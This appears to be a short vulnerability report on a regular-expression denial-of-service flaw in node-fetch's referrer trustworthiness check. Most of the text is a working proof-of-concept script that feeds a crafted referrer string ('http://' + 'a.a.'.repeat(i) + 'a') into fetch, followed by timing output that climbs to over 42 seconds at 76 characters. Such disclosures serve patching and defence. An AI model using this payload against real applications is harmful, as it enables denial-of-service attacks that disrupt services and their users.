Inefficient regular expression complexity regex when trying to match Potentially Trustworthy
could lead to a denial of service attack. With a formed payload 'http://' + 'a.a.'.repeat(i) + 'a'
, 76
characters payload could take 42642 ms
time execution.
// PoC.js
import fetch from 'node-fetch';
for (var i = 1; i <= 1000; i++) {
var time = Date.now();
var attack_str = 'http://' + 'a.a.'.repeat(i) + 'a'
const response = await fetch(
'https://google.com'/* any valid domain */,
{ "referrer": attack_str }
)
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms")
}
attack_str.length: 12: 248 ms
attack_str.length: 16: 242 ms
attack_str.length: 20: 231 ms
attack_str.length: 24: 231 ms
attack_str.length: 28: 247 ms
attack_str.length: 32: 233 ms
attack_str.length: 36: 218 ms
attack_str.length: 40: 244 ms
attack_str.length: 44: 232 ms
attack_str.length: 48: 230 ms
attack_str.length: 52: 240 ms
attack_str.length: 56: 263 ms
attack_str.length: 60: 406 ms
attack_str.length: 64: 893 ms
attack_str.length: 68: 2908 ms
attack_str.length: 72: 10775 ms
attack_str.length: 76: 42642 ms